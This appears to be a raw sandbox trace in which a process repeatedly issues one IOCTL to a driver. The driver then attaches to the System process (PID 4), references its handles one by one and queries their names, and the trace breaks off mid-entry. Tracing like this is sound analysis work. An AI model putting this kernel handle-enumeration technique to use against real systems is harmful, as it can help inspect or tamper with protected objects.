[0118.054] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0118.054] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.054] PsAcquireProcessExitSynchronization () returned 0x0 [0118.054] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.065] ObReferenceObjectByHandle (in: Handle=0xffffffff800001fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800349f2b0, HandleInformation=0x0) returned 0x0 [0118.065] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.065] PsReleaseProcessExitSynchronization () returned 0x2 [0118.065] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.065] ObQueryNameString (in: Object=0xfffffa800349f2b0, ObjectNameInfo=0xfffffa8002878044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002878044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.065] ObfDereferenceObject (Object=0xfffffa800349f2b0) returned 0x1 [0118.065] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.065] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.065] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.065] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0118.065] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.065] PsAcquireProcessExitSynchronization () returned 0x0 [0118.065] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.066] ObReferenceObjectByHandle (in: Handle=0xffffffff80000200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800352a690, HandleInformation=0x0) returned 0x0 [0118.066] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.066] PsReleaseProcessExitSynchronization () returned 0x2 [0118.066] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.066] ObQueryNameString (in: Object=0xfffffa800352a690, ObjectNameInfo=0xfffffa8002879044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002879044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.066] ObfDereferenceObject (Object=0xfffffa800352a690) returned 0x1 [0118.066] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.066] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.066] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.066] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0118.066] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.066] PsAcquireProcessExitSynchronization () returned 0x0 [0118.066] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.066] ObReferenceObjectByHandle (in: Handle=0xffffffff80000204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800352af20, HandleInformation=0x0) returned 0x0 [0118.066] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.066] PsReleaseProcessExitSynchronization () returned 0x2 [0118.066] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.066] ObQueryNameString (in: Object=0xfffffa800352af20, ObjectNameInfo=0xfffffa800287a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.066] ObfDereferenceObject (Object=0xfffffa800352af20) returned 0x1 [0118.066] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.066] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.066] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.066] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0118.067] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.067] PsAcquireProcessExitSynchronization () returned 0x0 [0118.067] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.067] ObReferenceObjectByHandle (in: Handle=0xffffffff80000208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003547d40, HandleInformation=0x0) returned 0x0 [0118.067] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.067] PsReleaseProcessExitSynchronization () returned 0x2 [0118.067] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.067] ObQueryNameString (in: Object=0xfffffa8003547d40, ObjectNameInfo=0xfffffa800287b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.067] ObfDereferenceObject (Object=0xfffffa8003547d40) returned 0x11 [0118.067] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.067] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.068] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.068] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0118.069] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.069] PsAcquireProcessExitSynchronization () returned 0x0 [0118.069] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.069] ObReferenceObjectByHandle (in: Handle=0xffffffff80000224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003560f20, HandleInformation=0x0) returned 0x0 [0118.069] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.069] PsReleaseProcessExitSynchronization () returned 0x2 [0118.069] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.069] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800287c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800287c044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.069] ObfDereferenceObject (Object=0xfffffa8003560f20) returned 0x1 [0118.069] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.069] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.069] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.069] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xc2, lpOverlapped=0x0) returned 1 [0118.069] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.069] PsAcquireProcessExitSynchronization () returned 0x0 [0118.069] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.069] ObReferenceObjectByHandle (in: Handle=0xffffffff80000234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80035605a0, HandleInformation=0x0) returned 0x0 [0118.069] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.069] PsReleaseProcessExitSynchronization () returned 0x2 [0118.069] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.069] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800287d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800287d044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.069] ObfDereferenceObject (Object=0xfffffa80035605a0) returned 0x1 [0118.070] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.070] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.070] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.070] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0118.070] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.070] PsAcquireProcessExitSynchronization () returned 0x0 [0118.070] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.070] ObReferenceObjectByHandle (in: Handle=0xffffffff80000238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003563520, HandleInformation=0x0) returned 0x0 [0118.070] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.070] PsReleaseProcessExitSynchronization () returned 0x2 [0118.070] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.070] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800287f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800287f044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.070] ObfDereferenceObject (Object=0xfffffa8003563520) returned 0x1 [0118.070] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.070] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.070] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.070] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0118.070] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.070] PsAcquireProcessExitSynchronization () returned 0x0 [0118.070] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.070] ObReferenceObjectByHandle (in: Handle=0xffffffff80000240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003562770, HandleInformation=0x0) returned 0x0 [0118.070] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.070] PsReleaseProcessExitSynchronization () returned 0x2 [0118.070] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.070] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002880044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002880044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.071] ObfDereferenceObject (Object=0xfffffa8003562770) returned 0x21 [0118.071] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.071] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.071] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.071] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0118.071] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.071] PsAcquireProcessExitSynchronization () returned 0x0 [0118.071] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.071] ObReferenceObjectByHandle (in: Handle=0xffffffff8000026c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003680df0, HandleInformation=0x0) returned 0x0 [0118.071] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.071] PsReleaseProcessExitSynchronization () returned 0x2 [0118.071] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.071] ObQueryNameString (in: Object=0xfffffa8003680df0, ObjectNameInfo=0xfffffa8002881044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002881044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.071] ObfDereferenceObject (Object=0xfffffa8003680df0) returned 0x1 [0118.071] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.073] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.074] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.075] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0118.075] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.075] PsAcquireProcessExitSynchronization () returned 0x0 [0118.075] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.075] ObReferenceObjectByHandle (in: Handle=0xffffffff8000027c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003682e20, HandleInformation=0x0) returned 0x0 [0118.075] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.075] PsReleaseProcessExitSynchronization () returned 0x2 [0118.075] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.075] ObQueryNameString (in: Object=0xfffffa8003682e20, ObjectNameInfo=0xfffffa800281c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281c044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.075] ObfDereferenceObject (Object=0xfffffa8003682e20) returned 0x1 [0118.075] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.075] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.075] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.075] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0118.075] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.075] PsAcquireProcessExitSynchronization () returned 0x0 [0118.075] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.075] ObReferenceObjectByHandle (in: Handle=0xffffffff80000284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036801a0, HandleInformation=0x0) returned 0x0 [0118.075] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.075] PsReleaseProcessExitSynchronization () returned 0x2 [0118.075] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.075] ObQueryNameString (in: Object=0xfffffa80036801a0, ObjectNameInfo=0xfffffa800283d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800283d044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.075] ObfDereferenceObject (Object=0xfffffa80036801a0) returned 0x1 [0118.075] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.075] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.076] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.076] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0118.076] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.076] PsAcquireProcessExitSynchronization () returned 0x0 [0118.076] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.076] ObReferenceObjectByHandle (in: Handle=0xffffffff80000288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003682530, HandleInformation=0x0) returned 0x0 [0118.076] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.076] PsReleaseProcessExitSynchronization () returned 0x2 [0118.076] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.076] ObQueryNameString (in: Object=0xfffffa8003682530, ObjectNameInfo=0xfffffa800255c504, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800255c504, ReturnLength=0xfffff88005163550) returned 0x0 [0118.076] ObfDereferenceObject (Object=0xfffffa8003682530) returned 0x1 [0118.076] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.076] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.076] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.076] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0118.076] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.076] PsAcquireProcessExitSynchronization () returned 0x0 [0118.076] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.076] ObReferenceObjectByHandle (in: Handle=0xffffffff8000029c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003538520, HandleInformation=0x0) returned 0x0 [0118.076] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.076] PsReleaseProcessExitSynchronization () returned 0x2 [0118.076] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.076] ObQueryNameString (in: Object=0xfffffa8003538520, ObjectNameInfo=0xfffffa80027e2584, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e2584, ReturnLength=0xfffff88005163550) returned 0x0 [0118.077] ObfDereferenceObject (Object=0xfffffa8003538520) returned 0x1 [0118.077] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.077] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.077] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.077] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x70, lpOverlapped=0x0) returned 1 [0118.077] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.077] PsAcquireProcessExitSynchronization () returned 0x0 [0118.077] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.077] ObReferenceObjectByHandle (in: Handle=0xffffffff800002a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003698db0, HandleInformation=0x0) returned 0x0 [0118.077] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.077] PsReleaseProcessExitSynchronization () returned 0x2 [0118.077] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.077] ObQueryNameString (in: Object=0xfffffa8003698db0, ObjectNameInfo=0xfffffa800280a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.077] ObfDereferenceObject (Object=0xfffffa8003698db0) returned 0x1 [0118.077] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.077] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.077] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.077] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0118.077] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.077] PsAcquireProcessExitSynchronization () returned 0x0 [0118.077] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.077] ObReferenceObjectByHandle (in: Handle=0xffffffff800002b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8005213f20, HandleInformation=0x0) returned 0x0 [0118.078] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.078] PsReleaseProcessExitSynchronization () returned 0x2 [0118.078] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.078] ObQueryNameString (in: Object=0xfffffa8005213f20, ObjectNameInfo=0xfffffa8002816044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002816044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.078] ObfDereferenceObject (Object=0xfffffa8005213f20) returned 0x1 [0118.078] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.078] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.078] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.078] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0118.078] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.078] PsAcquireProcessExitSynchronization () returned 0x0 [0118.078] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.078] ObReferenceObjectByHandle (in: Handle=0xffffffff800002b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: 